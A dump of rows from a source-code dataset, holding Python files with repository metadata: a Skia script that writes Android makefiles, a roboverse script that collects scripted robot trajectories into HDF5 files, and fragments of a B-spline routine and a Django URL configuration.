            ((x1 >= t[idx]) & (x1 < t[idx + 1])).astype(float)
            for idx in range(len(t) - 1)
        ]
    )
    # Higher order basis via the B-spline recursion.
    # Bug fix: the loop previously iterated `for order in np.arange(1, 4)`,
    # shadowing (and silently ignoring) the `order` argument, so the basis was
    # always cubic. Use a separate loop variable bounded by the requested order
    # (identical output for order=3, which is what this file's callers use).
    for deg in np.arange(1, order + 1):
        basis_1 = []
        for idx in range(len(t) - 1):
            a = ((x1 - t[idx]) / (dt * deg)) * basis[idx]
            if (idx + deg + 1) < (nt - 1):
                b = (-(x1 - t[(idx + deg + 1)]) / (dt * deg)) * basis[
                    (idx + 1) % (nt - 1)
                ]
            else:
                b = np.zeros(len(x1))
            basis_1.append(a + b)
        basis = np.vstack(basis_1)
    # Fold the shifted copy back onto the original half to enforce periodicity.
    folded_basis = np.copy(basis)[: nt // 2, : len(x)]
    for idx in np.arange(-order, 0):
        folded_basis[idx, :] += np.copy(basis)[nt // 2 + idx, len(x) :]
    return folded_basis
| 0 | 0 | 0 |
58fb3a80e8c923b6b6872cddc70637f8833f56d6 | 9,842 | py | Python | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | 3 | 2015-08-16T03:44:19.000Z | 2015-08-16T17:31:59.000Z | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | null | null | null | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | 20 | 2017-01-09T01:07:17.000Z | 2020-08-19T06:46:45.000Z | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Functions for creating an Android.mk from already created dictionaries.
"""
import os
def write_group(f, name, items, append):
    """Write a makefile variable assignment listing all given values.

    Args:
      f: File open for writing (Android.mk)
      name: Name of the makefile variable (e.g. LOCAL_CFLAGS)
      items: list of strings to be passed to the variable.
      append: Whether to append to the variable or overwrite it.
    """
    # Nothing to emit for an empty value list.
    if not items:
        return
    operator = '+=' if append else ':='
    # First line carries the variable name; values continue on backslash-
    # terminated, tab-indented lines.
    lines = ['%s %s' % (name, operator)] + list(items)
    f.write(' \\\n\t'.join(lines))
    f.write('\n\n')
def write_local_vars(f, var_dict, append, name):
    """Write every entry of var_dict to the makefile via write_group.

    Args:
      f: File open for writing (Android.mk)
      var_dict: VarsDict holding the unique values for one configuration.
      append: Whether to append to each makefile variable or overwrite it.
      name: If not None, a string to be appended to each key.
    """
    for key in var_dict.keys():
        items = var_dict[key]
        if key == 'KNOWN_TARGETS':
            # KNOWN_TARGETS are not needed in the final make file.
            continue
        if key == 'LOCAL_CFLAGS':
            # Always append LOCAL_CFLAGS so flags defined earlier in the
            # makefile are preserved.
            target_key, do_append = key, True
        elif key == 'DEFINES':
            # DEFINES become -D flags appended to LOCAL_CFLAGS.
            target_key, do_append = 'LOCAL_CFLAGS', True
            items = ['-D' + define for define in items]
        else:
            target_key, do_append = key, append
        if name:
            target_key += '_' + name
        write_group(f, target_key, items, do_append)
# Banner prepended to every generated makefile, warning it is autogenerated.
AUTOGEN_WARNING = (
"""
###############################################################################
#
# THIS FILE IS AUTOGENERATED BY GYP_TO_ANDROID.PY. DO NOT EDIT.
#
# For bugs, please contact scroggo@google.com or djsollen@google.com
#
###############################################################################
"""
)
# Guidance (written into Android.mk) on keeping SK_DEBUG/SK_RELEASE consistent
# between libskia and its users.
DEBUGGING_HELP = (
"""
###############################################################################
#
# PROBLEMS WITH SKIA DEBUGGING?? READ THIS...
#
# The debug build results in changes to the Skia headers. This means that those
# using libskia must also be built with the debug version of the Skia headers.
# There are a few scenarios where this comes into play:
#
# (1) You're building debug code that depends on libskia.
# (a) If libskia is built in release, then define SK_RELEASE when building
# your sources.
# (b) If libskia is built with debugging (see step 2), then no changes are
# needed since your sources and libskia have been built with SK_DEBUG.
# (2) You're building libskia in debug mode.
# (a) RECOMMENDED: You can build the entire system in debug mode. Do this by
# updating your build/core/config.mk to include -DSK_DEBUG on the line
# that defines COMMON_GLOBAL_CFLAGS
# (b) You can update all the users of libskia to define SK_DEBUG when they are
# building their sources.
#
# NOTE: If neither SK_DEBUG or SK_RELEASE are defined then Skia checks NDEBUG to
# determine which build type to use.
###############################################################################
"""
)
# Trailing section that pulls the Skia tool makefiles into the build.
SKIA_TOOLS = (
"""
#############################################################
# Build the skia tools
#
# benchmark (timings)
include $(BASE_PATH)/bench/Android.mk
# diamond-master (one test to rule them all)
include $(BASE_PATH)/dm/Android.mk
"""
)
# Section header for the static-library build target.
STATIC_HEADER = (
"""
###############################################################################
# STATIC LIBRARY
#
# This target is only to be used internally for only one of two purposes...
# (1) statically linking into testing frameworks
# (2) as an inclusion target for the libskia.so shared library
###############################################################################
"""
)
# Section header for the shared-library build target.
SHARED_HEADER = (
"""
###############################################################################
# SHARED LIBRARY
###############################################################################
"""
)
# Preamble for skia_static_deps.mk explaining why the file exists.
STATIC_DEPS_INFO = (
"""
###############################################################################
#
# This file contains the shared and static dependencies needed by any target
# that attempts to statically link Skia (i.e. libskia_static build target).
#
# This is a workaround for the fact that the build system does not add these
# transitive dependencies when it attempts to link libskia_static into another
# library.
#
###############################################################################
"""
)
# Standard Android.mk boilerplate snippets.
CLEAR_VARS = ("""include $(CLEAR_VARS)\n""")
LOCAL_PATH = ("""LOCAL_PATH:= $(call my-dir)\n""")
class VarsDictData(object):
    """Bundle a VarsDict with a name and an optional makefile condition."""

    def __init__(self, vars_dict, name, condition=None):
        """Create a new VarsDictData.

        Args:
          vars_dict: A VarsDict. Can be accessed via self.vars_dict.
          name: Name associated with the VarsDict. Can be accessed via
            self.name.
          condition: Optional string representing a condition. If not None,
            used to create a conditional inside the makefile.
        """
        self.name = name
        self.vars_dict = vars_dict
        self.condition = condition
def write_static_deps_mk(target_dir, common, deviations_from_common):
    """Write skia_static_deps.mk listing shared/static link dependencies.

    Args:
      target_dir: The full path to the directory to write skia_static_deps.mk,
        or None to use the current working directory.
      common: VarsDict holding variables definitions common to all
        configurations.
      deviations_from_common: List of VarsDictData, one for each possible
        configuration. VarsDictData.condition, if not None, is written to the
        makefile as a condition guarding that configuration's dependencies.
    """
    target_file = 'skia_static_deps.mk'
    if target_dir:
        target_file = os.path.join(target_dir, target_file)
    with open(target_file, 'w') as f:
        f.write(AUTOGEN_WARNING)
        f.write(STATIC_DEPS_INFO)
        for data in deviations_from_common:
            shared_libs = data.vars_dict['LOCAL_SHARED_LIBRARIES']
            static_libs = data.vars_dict['LOCAL_STATIC_LIBRARIES']
            # Only emit the ifeq guard when there is something to guard.
            guarded = data.condition and (shared_libs or static_libs)
            if guarded:
                f.write('ifeq ($(%s), true)\n' % data.condition)
            write_group(f, 'LOCAL_SHARED_LIBRARIES', shared_libs, True)
            write_group(f, 'LOCAL_STATIC_LIBRARIES', static_libs, True)
            if guarded:
                f.write('endif\n\n')
        # Dependencies shared by every configuration come last.
        write_group(f, 'LOCAL_SHARED_LIBRARIES', common['LOCAL_SHARED_LIBRARIES'],
                    True)
        write_group(f, 'LOCAL_STATIC_LIBRARIES', common['LOCAL_STATIC_LIBRARIES'],
                    True)
def write_android_mk(target_dir, common, deviations_from_common):
    """Given all the variables, write the final make file.

    Args:
      target_dir: The full path to the directory to write Android.mk, or None
        to use the current working directory.
      common: VarsDict holding variables definitions common to all
        configurations.
      deviations_from_common: List of VarsDictData, one for each possible
        configuration. VarsDictData.name will be appended to each key before
        writing it to the makefile. VarsDictData.condition, if not None, will be
        written to the makefile as a condition to determine whether to include
        VarsDictData.vars_dict.

    NOTE: mutates common['LOCAL_MODULE'] in place (renamed to '<module>_static')
    as a side effect visible to the caller.
    """
    target_file = 'Android.mk'
    if target_dir:
        target_file = os.path.join(target_dir, target_file)
    with open(target_file, 'w') as f:
        f.write(AUTOGEN_WARNING)
        f.write('BASE_PATH := $(call my-dir)\n')
        f.write(LOCAL_PATH)
        f.write(DEBUGGING_HELP)
        # --- static library target ---
        f.write(STATIC_HEADER)
        f.write(CLEAR_VARS)
        # need flags to enable feedback driven optimization (FDO) when requested
        # by the build system.
        f.write('LOCAL_FDO_SUPPORT := true\n')
        f.write('ifneq ($(strip $(TARGET_FDO_CFLAGS)),)\n')
        f.write('\t# This should be the last -Oxxx specified in LOCAL_CFLAGS\n')
        f.write('\tLOCAL_CFLAGS += -O2\n')
        f.write('endif\n\n')
        f.write('LOCAL_ARM_MODE := thumb\n')
        f.write('# used for testing\n')
        f.write('#LOCAL_CFLAGS += -g -O0\n\n')
        # update the provided LOCAL_MODULE with a _static suffix
        local_module = common['LOCAL_MODULE'][0]
        static_local_module = local_module + '_static'
        common['LOCAL_MODULE'].reset()
        common['LOCAL_MODULE'].add(static_local_module)
        # Common variables first (overwrite), then per-configuration blocks
        # (append), each guarded by its condition when one is set.
        write_local_vars(f, common, False, None)
        for data in deviations_from_common:
            if data.condition:
                f.write('ifeq ($(%s), true)\n' % data.condition)
            write_local_vars(f, data.vars_dict, True, data.name)
            if data.condition:
                f.write('endif\n\n')
        f.write('LOCAL_MODULE_CLASS := STATIC_LIBRARIES\n')
        f.write('include $(BUILD_STATIC_LIBRARY)\n\n')
        # --- shared library target: wraps the static library whole ---
        f.write(SHARED_HEADER)
        f.write(CLEAR_VARS)
        f.write('LOCAL_MODULE_CLASS := SHARED_LIBRARIES\n')
        f.write('LOCAL_MODULE := %s\n' % local_module)
        f.write('LOCAL_WHOLE_STATIC_LIBRARIES := %s\n' % static_local_module)
        write_group(f, 'LOCAL_EXPORT_C_INCLUDE_DIRS',
                    common['LOCAL_EXPORT_C_INCLUDE_DIRS'], False)
        f.write('include $(BASE_PATH)/skia_static_deps.mk\n')
        f.write('include $(BUILD_SHARED_LIBRARY)\n')
        f.write(SKIA_TOOLS)
| 33.705479 | 80 | 0.63605 | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Functions for creating an Android.mk from already created dictionaries.
"""
import os
def write_group(f, name, items, append):
    """Write a makefile variable assignment listing all given values.

    Args:
      f: File open for writing (Android.mk)
      name: Name of the makefile variable (e.g. LOCAL_CFLAGS)
      items: list of strings to be passed to the variable.
      append: Whether to append to the variable or overwrite it.
    """
    # Nothing to emit for an empty value list.
    if not items:
        return
    operator = '+=' if append else ':='
    # First line carries the variable name; values continue on backslash-
    # terminated, tab-indented lines.
    lines = ['%s %s' % (name, operator)] + list(items)
    f.write(' \\\n\t'.join(lines))
    f.write('\n\n')
def write_local_vars(f, var_dict, append, name):
    """Write every entry of var_dict to the makefile via write_group.

    Args:
      f: File open for writing (Android.mk)
      var_dict: VarsDict holding the unique values for one configuration.
      append: Whether to append to each makefile variable or overwrite it.
      name: If not None, a string to be appended to each key.
    """
    for key in var_dict.keys():
        items = var_dict[key]
        if key == 'KNOWN_TARGETS':
            # KNOWN_TARGETS are not needed in the final make file.
            continue
        if key == 'LOCAL_CFLAGS':
            # Always append LOCAL_CFLAGS so flags defined earlier in the
            # makefile are preserved.
            target_key, do_append = key, True
        elif key == 'DEFINES':
            # DEFINES become -D flags appended to LOCAL_CFLAGS.
            target_key, do_append = 'LOCAL_CFLAGS', True
            items = ['-D' + define for define in items]
        else:
            target_key, do_append = key, append
        if name:
            target_key += '_' + name
        write_group(f, target_key, items, do_append)
# Banner prepended to every generated makefile, warning it is autogenerated.
AUTOGEN_WARNING = (
"""
###############################################################################
#
# THIS FILE IS AUTOGENERATED BY GYP_TO_ANDROID.PY. DO NOT EDIT.
#
# For bugs, please contact scroggo@google.com or djsollen@google.com
#
###############################################################################
"""
)
# Guidance (written into Android.mk) on keeping SK_DEBUG/SK_RELEASE consistent
# between libskia and its users.
DEBUGGING_HELP = (
"""
###############################################################################
#
# PROBLEMS WITH SKIA DEBUGGING?? READ THIS...
#
# The debug build results in changes to the Skia headers. This means that those
# using libskia must also be built with the debug version of the Skia headers.
# There are a few scenarios where this comes into play:
#
# (1) You're building debug code that depends on libskia.
# (a) If libskia is built in release, then define SK_RELEASE when building
# your sources.
# (b) If libskia is built with debugging (see step 2), then no changes are
# needed since your sources and libskia have been built with SK_DEBUG.
# (2) You're building libskia in debug mode.
# (a) RECOMMENDED: You can build the entire system in debug mode. Do this by
# updating your build/core/config.mk to include -DSK_DEBUG on the line
# that defines COMMON_GLOBAL_CFLAGS
# (b) You can update all the users of libskia to define SK_DEBUG when they are
# building their sources.
#
# NOTE: If neither SK_DEBUG or SK_RELEASE are defined then Skia checks NDEBUG to
# determine which build type to use.
###############################################################################
"""
)
# Trailing section that pulls the Skia tool makefiles into the build.
SKIA_TOOLS = (
"""
#############################################################
# Build the skia tools
#
# benchmark (timings)
include $(BASE_PATH)/bench/Android.mk
# diamond-master (one test to rule them all)
include $(BASE_PATH)/dm/Android.mk
"""
)
# Section header for the static-library build target.
STATIC_HEADER = (
"""
###############################################################################
# STATIC LIBRARY
#
# This target is only to be used internally for only one of two purposes...
# (1) statically linking into testing frameworks
# (2) as an inclusion target for the libskia.so shared library
###############################################################################
"""
)
# Section header for the shared-library build target.
SHARED_HEADER = (
"""
###############################################################################
# SHARED LIBRARY
###############################################################################
"""
)
# Preamble for skia_static_deps.mk explaining why the file exists.
STATIC_DEPS_INFO = (
"""
###############################################################################
#
# This file contains the shared and static dependencies needed by any target
# that attempts to statically link Skia (i.e. libskia_static build target).
#
# This is a workaround for the fact that the build system does not add these
# transitive dependencies when it attempts to link libskia_static into another
# library.
#
###############################################################################
"""
)
# Standard Android.mk boilerplate snippets.
CLEAR_VARS = ("""include $(CLEAR_VARS)\n""")
LOCAL_PATH = ("""LOCAL_PATH:= $(call my-dir)\n""")
class VarsDictData(object):
    """Bundle a VarsDict with a name and an optional makefile condition."""

    def __init__(self, vars_dict, name, condition=None):
        """Create a new VarsDictData.

        Args:
          vars_dict: A VarsDict. Can be accessed via self.vars_dict.
          name: Name associated with the VarsDict. Can be accessed via
            self.name.
          condition: Optional string representing a condition. If not None,
            used to create a conditional inside the makefile.
        """
        self.name = name
        self.vars_dict = vars_dict
        self.condition = condition
def write_static_deps_mk(target_dir, common, deviations_from_common):
    """Write skia_static_deps.mk listing shared/static link dependencies.

    Args:
      target_dir: The full path to the directory to write skia_static_deps.mk,
        or None to use the current working directory.
      common: VarsDict holding variables definitions common to all
        configurations.
      deviations_from_common: List of VarsDictData, one for each possible
        configuration. VarsDictData.condition, if not None, is written to the
        makefile as a condition guarding that configuration's dependencies.
    """
    target_file = 'skia_static_deps.mk'
    if target_dir:
        target_file = os.path.join(target_dir, target_file)
    with open(target_file, 'w') as f:
        f.write(AUTOGEN_WARNING)
        f.write(STATIC_DEPS_INFO)
        for data in deviations_from_common:
            shared_libs = data.vars_dict['LOCAL_SHARED_LIBRARIES']
            static_libs = data.vars_dict['LOCAL_STATIC_LIBRARIES']
            # Only emit the ifeq guard when there is something to guard.
            guarded = data.condition and (shared_libs or static_libs)
            if guarded:
                f.write('ifeq ($(%s), true)\n' % data.condition)
            write_group(f, 'LOCAL_SHARED_LIBRARIES', shared_libs, True)
            write_group(f, 'LOCAL_STATIC_LIBRARIES', static_libs, True)
            if guarded:
                f.write('endif\n\n')
        # Dependencies shared by every configuration come last.
        write_group(f, 'LOCAL_SHARED_LIBRARIES', common['LOCAL_SHARED_LIBRARIES'],
                    True)
        write_group(f, 'LOCAL_STATIC_LIBRARIES', common['LOCAL_STATIC_LIBRARIES'],
                    True)
def write_android_mk(target_dir, common, deviations_from_common):
    """Given all the variables, write the final make file.

    Args:
      target_dir: The full path to the directory to write Android.mk, or None
        to use the current working directory.
      common: VarsDict holding variables definitions common to all
        configurations.
      deviations_from_common: List of VarsDictData, one for each possible
        configuration. VarsDictData.name will be appended to each key before
        writing it to the makefile. VarsDictData.condition, if not None, will be
        written to the makefile as a condition to determine whether to include
        VarsDictData.vars_dict.

    NOTE: mutates common['LOCAL_MODULE'] in place (renamed to '<module>_static')
    as a side effect visible to the caller.
    """
    target_file = 'Android.mk'
    if target_dir:
        target_file = os.path.join(target_dir, target_file)
    with open(target_file, 'w') as f:
        f.write(AUTOGEN_WARNING)
        f.write('BASE_PATH := $(call my-dir)\n')
        f.write(LOCAL_PATH)
        f.write(DEBUGGING_HELP)
        # --- static library target ---
        f.write(STATIC_HEADER)
        f.write(CLEAR_VARS)
        # need flags to enable feedback driven optimization (FDO) when requested
        # by the build system.
        f.write('LOCAL_FDO_SUPPORT := true\n')
        f.write('ifneq ($(strip $(TARGET_FDO_CFLAGS)),)\n')
        f.write('\t# This should be the last -Oxxx specified in LOCAL_CFLAGS\n')
        f.write('\tLOCAL_CFLAGS += -O2\n')
        f.write('endif\n\n')
        f.write('LOCAL_ARM_MODE := thumb\n')
        f.write('# used for testing\n')
        f.write('#LOCAL_CFLAGS += -g -O0\n\n')
        # update the provided LOCAL_MODULE with a _static suffix
        local_module = common['LOCAL_MODULE'][0]
        static_local_module = local_module + '_static'
        common['LOCAL_MODULE'].reset()
        common['LOCAL_MODULE'].add(static_local_module)
        # Common variables first (overwrite), then per-configuration blocks
        # (append), each guarded by its condition when one is set.
        write_local_vars(f, common, False, None)
        for data in deviations_from_common:
            if data.condition:
                f.write('ifeq ($(%s), true)\n' % data.condition)
            write_local_vars(f, data.vars_dict, True, data.name)
            if data.condition:
                f.write('endif\n\n')
        f.write('LOCAL_MODULE_CLASS := STATIC_LIBRARIES\n')
        f.write('include $(BUILD_STATIC_LIBRARY)\n\n')
        # --- shared library target: wraps the static library whole ---
        f.write(SHARED_HEADER)
        f.write(CLEAR_VARS)
        f.write('LOCAL_MODULE_CLASS := SHARED_LIBRARIES\n')
        f.write('LOCAL_MODULE := %s\n' % local_module)
        f.write('LOCAL_WHOLE_STATIC_LIBRARIES := %s\n' % static_local_module)
        write_group(f, 'LOCAL_EXPORT_C_INCLUDE_DIRS',
                    common['LOCAL_EXPORT_C_INCLUDE_DIRS'], False)
        f.write('include $(BASE_PATH)/skia_static_deps.mk\n')
        f.write('include $(BUILD_SHARED_LIBRARY)\n')
        f.write(SKIA_TOOLS)
| 0 | 0 | 0 |
87e3d4ce5ec6959c3eb2645e9291823efb370d74 | 8,234 | py | Python | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | import numpy as np
import time
import os
import os.path as osp
import roboverse
from roboverse.policies import policies
import argparse
from tqdm import tqdm
import h5py
from roboverse.utils import get_timestamp
EPSILON = 0.1
def dump2h5(traj, path, image_rendered):
    """Dumps a collected trajectory to HDF5 file."""
    observations = traj['observations']
    # Stack per-step fields into arrays.
    states = np.array([obs['state'] for obs in observations])
    actions = np.array(traj['actions'])
    rewards = np.array(traj['rewards'])
    terminals = np.array(traj['terminals'])
    out = h5py.File(path, "w")
    out.create_dataset("traj_per_file", data=1)
    # All trajectory datasets live in the "traj0" group.
    group = out.create_group("traj0")
    group.create_dataset("states", data=states)
    if image_rendered:
        images = np.array([obs['image'] for obs in observations])
        group.create_dataset("images", data=images, dtype=np.uint8)
    group.create_dataset("actions", data=actions)
    group.create_dataset("rewards", data=rewards)
    # Guarantee at least one terminal so the pad mask is well defined.
    if np.sum(terminals) == 0:
        terminals[-1] = True
    # Pad mask is 1 up to (but excluding) the first terminal step.
    first_terminal = np.nonzero(terminals)[0][0]
    pad_mask = np.zeros((len(terminals),))
    pad_mask[:first_terminal] = 1.
    group.create_dataset("pad_mask", data=pad_mask)
    out.close()
if __name__ == "__main__":
    # Command-line entry point for scripted data collection.
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--env-name", type=str, required=True)
    parser.add_argument("-nt", "--num-task", type=int, default=3)
    parser.add_argument("-pl", "--policy-name", type=str, required=True)
    # Key used to decide trajectory success (env info key, or 'table_clean').
    parser.add_argument("-a", "--accept-trajectory-key", type=str, required=True)
    parser.add_argument("-n", "--num-trajectories", type=int, required=True)
    parser.add_argument("-t", "--num-timesteps", type=int, required=True)
    # Save failed trajectories as well as successful ones.
    parser.add_argument("--save-all", action='store_true', default=False)
    parser.add_argument("--gui", action='store_true', default=False)
    parser.add_argument("-o", "--target-object", type=str)
    # NOTE(review): the stray trailing comma below turns this statement into a
    # 1-tuple; harmless but likely unintended.
    parser.add_argument("-d", "--save-directory", type=str, default=""),
    # Std-dev of the Gaussian noise added to scripted actions.
    parser.add_argument("--noise", type=float, default=0.1)
    parser.add_argument("-r", "--image-rendered", type=int, default=0)
    parser.add_argument("-f", "--full-reward", type=int, default=0)
    args = parser.parse_args()
    main(args)
| 36.114035 | 100 | 0.629342 | import numpy as np
import time
import os
import os.path as osp
import roboverse
from roboverse.policies import policies
import argparse
from tqdm import tqdm
import h5py
from roboverse.utils import get_timestamp
EPSILON = 0.1
def add_transition(traj, observation, action, reward, info, agent_info, done,
                   next_observation, img_dim, image_rendered=True):
    """Append one environment transition to *traj* (returned for chaining)."""
    if image_rendered:
        # Convert float images in [0, 1] to uint8 HxWx3 arrays, in place.
        for obs in (observation, next_observation):
            obs["image"] = np.reshape(np.uint8(obs["image"] * 255.),
                                      (img_dim, img_dim, 3))
    fields = (
        ("observations", observation),
        ("next_observations", next_observation),
        ("actions", action),
        ("rewards", reward),
        ("terminals", done),
        ("agent_infos", agent_info),
        ("env_infos", info),
    )
    for key, value in fields:
        traj[key].append(value)
    return traj
def collect_one_traj(env, policy, num_timesteps, noise,
                     accept_trajectory_key, image_rendered, args):
    """Roll out *policy* in *env* for up to *num_timesteps* steps.

    Args:
        env: roboverse environment instance.
        policy: scripted policy providing get_action()/reset().
        num_timesteps: maximum number of steps in the trajectory.
        noise: std-dev of Gaussian noise added to the scripted actions.
        accept_trajectory_key: env info key used to judge success, or
            'table_clean' to require the full subtask reward instead.
        image_rendered: whether observations carry images to reshape.
        args: parsed command-line args (unused here; kept for interface
            compatibility).

    Returns:
        (traj, success, num_steps) where num_steps is the first step at which
        the success criterion held, or -1 if it never did.
    """
    # Cleanup: removed dead locals `is_opened`, `is_closed` and the unused
    # `rewards` accumulator from the original implementation.
    num_steps = -1
    success = False
    img_dim = env.observation_img_dim
    env.reset()
    policy.reset()
    time.sleep(1)  # give the simulation time to settle after reset
    traj = dict(
        observations=[],
        actions=[],
        rewards=[],
        next_observations=[],
        terminals=[],
        agent_infos=[],
        env_infos=[],
    )
    total_reward = 0
    # Maximum achievable reward (sum over all subtasks); used by the
    # 'table_clean' success criterion below.
    total_reward_thresh = sum([subtask.REWARD for subtask in env.subtasks])
    for j in range(num_timesteps):
        action, agent_info, add_noise = policy.get_action()
        # In case we need to pad actions by 1 for easier realNVP modelling
        env_action_dim = env.action_space.shape[0]
        if env_action_dim - action.shape[0] == 1:
            action = np.append(action, 0)
        # The scripted policy flags steps where full noise is acceptable;
        # otherwise use attenuated noise.
        if add_noise:
            action += np.random.normal(scale=noise, size=(env_action_dim,))
        else:
            action += np.random.normal(scale=noise * 0.3, size=(env_action_dim,))
        action = np.clip(action, -1 + EPSILON, 1 - EPSILON)
        observation = env.get_observation()
        next_observation, reward, done, info = env.step(action)
        add_transition(traj, observation, action, reward, info, agent_info,
                       done, next_observation, img_dim, image_rendered)
        total_reward += reward
        if accept_trajectory_key == 'table_clean':
            # Success when every subtask reward has been collected.
            if total_reward == total_reward_thresh and num_steps < 0:
                num_steps = j
            if total_reward == total_reward_thresh:
                success = True
        else:
            if info[accept_trajectory_key] and num_steps < 0:
                num_steps = j
            if info[accept_trajectory_key]:
                success = True
        if done or agent_info['done']:
            break
    return traj, success, num_steps
def dump2h5(traj, path, image_rendered):
    """Dumps a collected trajectory to HDF5 file."""
    observations = traj['observations']
    # Stack per-step fields into arrays.
    states = np.array([obs['state'] for obs in observations])
    actions = np.array(traj['actions'])
    rewards = np.array(traj['rewards'])
    terminals = np.array(traj['terminals'])
    out = h5py.File(path, "w")
    out.create_dataset("traj_per_file", data=1)
    # All trajectory datasets live in the "traj0" group.
    group = out.create_group("traj0")
    group.create_dataset("states", data=states)
    if image_rendered:
        images = np.array([obs['image'] for obs in observations])
        group.create_dataset("images", data=images, dtype=np.uint8)
    group.create_dataset("actions", data=actions)
    group.create_dataset("rewards", data=rewards)
    # Guarantee at least one terminal so the pad mask is well defined.
    if np.sum(terminals) == 0:
        terminals[-1] = True
    # Pad mask is 1 up to (but excluding) the first terminal step.
    first_terminal = np.nonzero(terminals)[0][0]
    pad_mask = np.zeros((len(terminals),))
    pad_mask[:first_terminal] = 1.
    group.create_dataset("pad_mask", data=pad_mask)
    out.close()
def main(args):
    """Collect scripted demonstration trajectories and save them to disk.

    Each successful trajectory is written as an individual HDF5 rollout;
    all kept trajectories are additionally saved as one aggregate .npy
    file, with running occurrence statistics dumped to 'occurance.txt'.
    """
    timestamp = get_timestamp()
    data_save_path = osp.abspath(args.save_directory)
    if not osp.exists(data_save_path):
        os.makedirs(data_save_path)
    env = roboverse.make(args.env_name,
                         gui=args.gui,
                         transpose_image=False)
    data = []
    assert args.policy_name in policies.keys(), f"The policy name must be one of: {policies.keys()}"
    policy_class = policies[args.policy_name]
    policy = policy_class(env)
    num_success = 0
    num_saved = 0
    num_attempts = 0
    accept_trajectory_key = args.accept_trajectory_key
    progress_bar = tqdm(total=args.num_trajectories)
    # running occurrence statistics reported by the environment
    total_area_occurance = [0, 0, 0]
    total_object_occurance = {name: 0 for name in env.object_names}
    while num_saved < args.num_trajectories:
        num_attempts += 1
        traj, success, num_steps = collect_one_traj(
            env, policy, args.num_timesteps, args.noise,
            accept_trajectory_key, args.image_rendered, args)
        if success:
            if args.gui:
                print("num_timesteps: ", num_steps)
            data.append(traj)
            dump2h5(traj, os.path.join(data_save_path, 'rollout_{}.h5'.format(num_saved)),
                    args.image_rendered)
            num_success += 1
            num_saved += 1
            # accumulate per-area / per-object occurrence counts
            area_occurance, object_occurance = env.get_occurance()
            for i in range(len(area_occurance)):
                total_area_occurance[i] += area_occurance[i]
            for object_name in env.object_names:
                total_object_occurance[object_name] += object_occurance[object_name]
            # rewrite the stats file after every success so it survives a
            # crash; 'with' closes the handle even if a write raises (the
            # original used open/close and could leak the handle)
            with open(os.path.join(data_save_path, 'occurance.txt'), "w") as fo:
                fo.write(f"area_occurance: {total_area_occurance}\n")
                fo.write(f"object_occurance: {total_object_occurance}\n")
            progress_bar.update(1)
        elif args.save_all:
            data.append(traj)
            num_saved += 1
            progress_bar.update(1)
        if args.gui:
            print("success rate: {}".format(num_success / num_attempts))
    progress_bar.close()
    # guard division by zero when --num-trajectories is 0 (loop never ran)
    if num_attempts:
        print("success rate: {}".format(num_success / (num_attempts)))
    print(total_area_occurance, total_object_occurance)
    path = osp.join(data_save_path, "scripted_{}_{}.npy".format(
        args.env_name, timestamp))
    print(path)
    np.save(path, data)
if __name__ == "__main__":
    # Command-line interface for scripted trajectory collection.
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--env-name", type=str, required=True)
    parser.add_argument("-nt", "--num-task", type=int, default=3)
    parser.add_argument("-pl", "--policy-name", type=str, required=True)
    parser.add_argument("-a", "--accept-trajectory-key", type=str, required=True)
    parser.add_argument("-n", "--num-trajectories", type=int, required=True)
    parser.add_argument("-t", "--num-timesteps", type=int, required=True)
    parser.add_argument("--save-all", action='store_true', default=False)
    parser.add_argument("--gui", action='store_true', default=False)
    parser.add_argument("-o", "--target-object", type=str)
    # fixed: original line ended with a stray trailing comma, which turned
    # the statement into a one-element tuple (harmless but a typo)
    parser.add_argument("-d", "--save-directory", type=str, default="")
    parser.add_argument("--noise", type=float, default=0.1)
    parser.add_argument("-r", "--image-rendered", type=int, default=0)
    parser.add_argument("-f", "--full-reward", type=int, default=0)
    args = parser.parse_args()
    main(args)
| 5,732 | 0 | 69 |
7d61c1160eddb50ddcacb8eb204ce8b18e82bfac | 2,349 | py | Python | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import RedirectView
from rest_framework_swagger import renderers
from rest_framework import exceptions
from rest_framework.permissions import AllowAny
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.response import Response
from rest_framework.schemas import SchemaGenerator
from rest_framework.views import APIView
from api import urls as api_urls
from web_api import urls as webapi_urls
def get_swagger_view(title=None, url=None, patterns=None, urlconf=None, description=None):
    """
    Returns schema view which renders Swagger/OpenAPI.

    The returned view builds a schema document for the given URL conf on
    each GET and renders it with the Swagger UI / OpenAPI renderers.
    """
    # Restored: this closure class was missing, leaving SwaggerSchemaView
    # undefined and making the function raise NameError when called.
    class SwaggerSchemaView(APIView):
        # hidden from the generated schema and open to anonymous browsing
        _ignore_model_permissions = True
        exclude_from_schema = True
        permission_classes = [AllowAny]
        renderer_classes = [
            CoreJSONRenderer,
            renderers.OpenAPIRenderer,
            renderers.SwaggerUIRenderer
        ]

        def get(self, request):
            # build the schema document on demand from the captured arguments
